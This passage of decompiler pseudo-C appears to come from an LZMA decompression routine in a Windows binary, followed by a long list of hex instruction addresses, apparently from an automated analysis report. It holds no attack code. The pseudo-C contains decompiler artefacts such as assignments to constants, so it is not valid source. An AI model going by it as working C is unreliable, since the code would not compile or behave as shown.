													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                              0x00000000
                                              0x004066f0
                                              0x004066f0
                                              0x004066f4
                                              0x00406701
                                              0x0040670b
                                              0x00000000
                                              0x004066f6
                                              0x004066f6
                                              0x00406731
                                              0x00406734
                                              0x00406737
                                              0x0040673a
                                              0x0040673a
                                              0x0040673d
                                              0x00406744
                                              0x00406749
                                              0x0040662a
                                              0x0040662d
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x004069a2
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069ee
                                              0x00000000
                                              0x00000000
                                              0x004069f0
                                              0x004069f4
                                              0x00406ba3
                                              0x00406bb9
                                              0x00406bc1
                                              0x00406bc8
                                              0x00406bca
                                              0x00406bd1
                                              0x00406bd5
                                              0x00406bd5
                                              0x00406a00
                                              0x00406a07
                                              0x00406a0f
                                              0x00406a12
                                              0x00406a15
                                              0x00406a15
                                              0x00406a1b
                                              0x00406a1b
                                              0x004061b7
                                              0x004061b7
                                              0x004061b7
                                              0x004061c0
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00000000
                                              0x004061d1
                                              0x00000000
                                              0x00000000
                                              0x004061da
                                              0x004061dd
                                              0x004061e0
                                              0x004061e4
                                              0x00000000
                                              0x00000000
                                              0x004061ea
                                              0x004061ed
                                              0x004061ef
                                              0x004061f0
                                              0x004061f3
                                              0x004061f5
                                              0x004061f6
                                              0x004061f8
                                              0x004061fb
                                              0x00406200
                                              0x00406205
                                              0x0040620e
                                              0x00406221
                                              0x00406224
                                              0x00406230
                                              0x00406258
                                              0x0040625a
                                              0x00406268
                                              0x00406268
                                              0x0040626c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040625c
                                              0x0040625c
                                              0x0040625f
                                              0x00406260
                                              0x00406260
                                              0x00000000
                                              0x0040625c
                                              0x00406236
                                              0x0040623b
                                              0x0040623b
                                              0x00406244
                                              0x0040624c
                                              0x0040624f
                                              0x00000000
                                              0x00406255
                                              0x00406255
                                              0x00000000
                                              0x00406255
                                              0x00000000
                                              0x00406272
                                              0x00406272
                                              0x00406276
                                              0x00406b22
                                              0x00000000
                                              0x00406b22
                                              0x0040627f
                                              0x0040628f
                                              0x00406292
                                              0x00406295
                                              0x00406295
                                              0x00406295
                                              0x00406298
                                              0x0040629c
                                              0x00000000
                                              0x00000000
                                              0x0040629e
                                              0x004062a4
                                              0x004062ce
                                              0x004062d4
                                              0x004062db
                                              0x00000000
                                              0x004062db
                                              0x004062aa
                                              0x004062ad
                                              0x004062b2
                                              0x004062b2
                                              0x004062bd
                                              0x004062c5
                                              0x004062c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040630d
                                              0x00406313
                                              0x00406316
                                              0x00406323
                                              0x0040632b
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x00000000
                                              0x004062e2
                                              0x004062e2
                                              0x004062e6
                                              0x00406b31
                                              0x00000000
                                              0x00406b31
                                              0x004062f2
                                              0x004062fd
                                              0x004062fd
                                              0x004062fd
                                              0x00406300
                                              0x00406303
                                              0x00406306
                                              0x0040630b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069ee
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406333
                                              0x00406335
                                              0x00406338
                                              0x004063a9
                                              0x004063ac
                                              0x004063af
                                              0x004063b6
                                              0x004063c0
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040699f
                                              0x0040633a
                                              0x0040633e
                                              0x00406341
                                              0x00406343
                                              0x00406346
                                              0x00406349
                                              0x0040634b
                                              0x0040634e
                                              0x00406350
                                              0x00406355
                                              0x00406358
                                              0x0040635b
                                              0x0040635f
                                              0x00406366
                                              0x00406369
                                              0x00406370
                                              0x00406374
                                              0x0040637c
                                              0x0040637c
                                              0x0040637c
                                              0x00406376
                                              0x00406376
                                              0x00406376
                                              0x0040636b
                                              0x0040636b
                                              0x0040636b
                                              0x00406380
                                              0x00406383
                                              0x004063a1
                                              0x004063a3
                                              0x00000000
                                              0x00406385
                                              0x00406385
                                              0x00406388
                                              0x0040638b
                                              0x0040638e
                                              0x00406390
                                              0x00406390
                                              0x00406390
                                              0x00406393
                                              0x00406396
                                              0x00406398
                                              0x00406399
                                              0x0040639c
                                              0x00000000
                                              0x0040639c
                                              0x00000000
                                              0x004065d2
                                              0x004065d6
                                              0x004065f4
                                              0x004065f7
                                              0x004065fe
                                              0x00406601
                                              0x00406604
                                              0x00406607
                                              0x0040660a
                                              0x0040660d
                                              0x0040660f
                                              0x00406616
                                              0x00406617
                                              0x00406619
                                              0x0040661c
                                              0x0040661f
                                              0x00406622
                                              0x00406622
                                              0x00406627
                                              0x00000000
                                              0x00406627
                                              0x004065d8
                                              0x004065db
                                              0x004065de
                                              0x004065e8
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x00000000
                                              0x0040663c
                                              0x00406640
                                              0x00406663
                                              0x00406666
                                              0x00406669
                                              0x00406673
                                              0x00406642
                                              0x00406642
                                              0x00406645
                                              0x00406648
                                              0x0040664b
                                              0x00406658
                                              0x0040665b
                                              0x0040665b
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x00000000
                                              0x0040667f
                                              0x00406683
                                              0x00000000
                                              0x00000000
                                              0x00406689
                                              0x0040668d
                                              0x00000000
                                              0x00000000
                                              0x00406693
                                              0x00406695
                                              0x00406699
                                              0x00406699
                                              0x0040669c
                                              0x004066a0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406717
                                              0x0040671b
                                              0x00406722
                                              0x00406725
                                              0x00406728
                                              0x0040671d
                                              0x0040671d
                                              0x0040671d
                                              0x0040672b
                                              0x0040672e
                                              0x00000000
                                              0x00000000
                                              0x004067d7
                                              0x004067d7
                                              0x004067db
                                              0x00406b79
                                              0x00000000
                                              0x00406b79
                                              0x004067e1
                                              0x004067e4
                                              0x004067e7
                                              0x004067eb
                                              0x004067ee
                                              0x004067f4
                                              0x004067f6
                                              0x004067f6
                                              0x004067f6
                                              0x004067f9
                                              0x004067fc
                                              0x00000000
                                              0x00000000
                                              0x004063cc
                                              0x004063cc
                                              0x004063d0
                                              0x00406b3d
                                              0x00000000
                                              0x00406b3d
                                              0x004063d6
                                              0x004063d9
                                              0x004063dc
                                              0x004063e0
                                              0x004063e3
                                              0x004063e9
                                              0x004063eb
                                              0x004063eb
                                              0x004063eb
                                              0x004063ee
                                              0x004063f1
                                              0x004063f1
                                              0x004063f4
                                              0x004063f7
                                              0x00000000
                                              0x00000000
                                              0x004063fd
                                              0x00406403
                                              0x00000000
                                              0x00000000
                                              0x00406409
                                              0x00406409
                                              0x0040640d
                                              0x00406410
                                              0x00406413
                                              0x00406416
                                              0x00406419
                                              0x0040641a
                                              0x0040641d
                                              0x0040641f
                                              0x00406425
                                              0x00406428
                                              0x0040642b
                                              0x0040642e
                                              0x00406431
                                              0x00406434
                                              0x00406437
                                              0x00406453
                                              0x00406456
                                              0x00406459
                                              0x0040645c
                                              0x00406463
                                              0x00406467
                                              0x00406469
                                              0x0040646d
                                              0x00406439
                                              0x00406439
                                              0x0040643d
                                              0x00406445
                                              0x0040644a
                                              0x0040644c
                                              0x0040644e
                                              0x0040644e
                                              0x00406470
                                              0x00406477
                                              0x0040647a
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406485
                                              0x00406485
                                              0x00406489
                                              0x00406b49
                                              0x00000000
                                              0x00406b49
                                              0x0040648f
                                              0x00406492
                                              0x00406495
                                              0x00406499
                                              0x0040649c
                                              0x004064a2
                                              0x004064a4
                                              0x004064a4
                                              0x004064a4
                                              0x004064a7
                                              0x004064aa
                                              0x004064aa
                                              0x004064aa
                                              0x004064b0
                                              0x00000000
                                              0x00000000
                                              0x004064b2
                                              0x004064b5
                                              0x004064b8
                                              0x004064bb
                                              0x004064be
                                              0x004064c1
                                              0x004064c4
                                              0x004064c7
                                              0x004064ca
                                              0x004064cd
                                              0x004064d0
                                              0x004064e8
                                              0x004064eb
                                              0x004064ee
                                              0x004064f1
                                              0x004064f1
                                              0x004064f4
                                              0x004064f8
                                              0x004064fa
                                              0x004064d2
                                              0x004064d2
                                              0x004064da
                                              0x004064df
                                              0x004064e1
                                              0x004064e3
                                              0x004064e3
                                              0x004064fd
                                              0x00406504
                                              0x00406507
                                              0x00000000
                                              0x00406509
                                              0x00000000
                                              0x00406509
                                              0x00406507
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x00000000
                                              0x00000000
                                              0x00406549
                                              0x00406549
                                              0x0040654d
                                              0x00406b55
                                              0x00000000
                                              0x00406b55
                                              0x00406553
                                              0x00406556
                                              0x00406559
                                              0x0040655d
                                              0x00406560
                                              0x00406566
                                              0x00406568
                                              0x00406568
                                              0x00406568
                                              0x0040656b
                                              0x0040656e
                                              0x0040656e
                                              0x00406574
                                              0x00406512
                                              0x00406512
                                              0x00406515
                                              0x00000000
                                              0x00406515
                                              0x00406576
                                              0x00406576
                                              0x00406579
                                              0x0040657c
                                              0x0040657f
                                              0x00406582
                                              0x00406585
                                              0x00406588
                                              0x0040658b
                                              0x0040658e
                                              0x00406591
                                              0x00406594
                                              0x004065ac
                                              0x004065af
                                              0x004065b2
                                              0x004065b5
                                              0x004065b5
                                              0x004065b8
                                              0x004065bc
                                              0x004065be
                                              0x00406596
                                              0x00406596
                                              0x0040659e
                                              0x004065a3
                                              0x004065a5
                                              0x004065a7
                                              0x004065a7
                                              0x004065c1
                                              0x004065c8
                                              0x004065cb
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x0040685a
                                              0x0040685a
                                              0x0040685e
                                              0x00406b85
                                              0x00000000
                                              0x00406b85
                                              0x00406864
                                              0x00406867
                                              0x0040686a
                                              0x0040686e
                                              0x00406871
                                              0x00406877
                                              0x00406879
                                              0x00406879
                                              0x00406879
                                              0x0040687c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406969
                                              0x0040696d
                                              0x0040698f
                                              0x00406992
                                              0x0040699c
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040699f
                                              0x0040696f
                                              0x00406972
                                              0x00406976
                                              0x00406979
                                              0x00406979
                                              0x0040697c
                                              0x00000000
                                              0x00000000
                                              0x00406a26
                                              0x00406a2a
                                              0x00406a48
                                              0x00406a48
                                              0x00406a48
                                              0x00406a4f
                                              0x00406a56
                                              0x00406a5d
                                              0x00406a5d
                                              0x00000000
                                              0x00406a5d
                                              0x00406a2c
                                              0x00406a2f
                                              0x00406a32
                                              0x00406a35
                                              0x00406a3c
                                              0x00406980
                                              0x00406980
                                              0x00406983
                                              0x00000000
                                              0x00000000
                                              0x00406b17
                                              0x00406b1a
                                              0x00406a1b
                                              0x00000000
                                              0x00000000
                                              0x00406751
                                              0x00406753
                                              0x0040675a
                                              0x0040675b
                                              0x0040675d
                                              0x00406760
                                              0x00000000
                                              0x00000000
                                              0x00406768
                                              0x0040676b
                                              0x0040676e
                                              0x00406770
                                              0x00406772
                                              0x00406772
                                              0x00406773
                                              0x00406776
                                              0x0040677d
                                              0x00406780
                                              0x0040678e
                                              0x00000000
                                              0x00000000
                                              0x00406a64
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00000000
                                              0x00000000
                                              0x00406a73
                                              0x00406a73
                                              0x00406a77
                                              0x00406baf
                                              0x00000000
                                              0x00406baf
                                              0x00406a7d
                                              0x00406a80
                                              0x00406a83
                                              0x00406a87
                                              0x00406a8a
                                              0x00406a90
                                              0x00406a92
                                              0x00406a92
                                              0x00406a92
                                              0x00406a95
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a9b
                                              0x00406a9b
                                              0x00406a9f
                                              0x00406aff
                                              0x00406b02
                                              0x00406b07
                                              0x00406b08
                                              0x00406b0a
                                              0x00406b0c
                                              0x00406b0f
                                              0x00406a1b
                                              0x00406a1b
                                              0x00000000
                                              0x00406a21
                                              0x00406a1b
                                              0x00406aa1
                                              0x00406aa7
                                              0x00406aaa
                                              0x00406aad
                                              0x00406ab0
                                              0x00406ab3
                                              0x00406ab6
                                              0x00406ab9
                                              0x00406abc
                                              0x00406abf
                                              0x00406ac2
                                              0x00406adb
                                              0x00406ade
                                              0x00406ae1
                                              0x00406ae4
                                              0x00406ae8
                                              0x00406aea
                                              0x00406aea
                                              0x00406aeb
                                              0x00406aee
                                              0x00406ac4
                                              0x00406ac4
                                              0x00406acc
                                              0x00406ad1
                                              0x00406ad3
                                              0x00406ad6
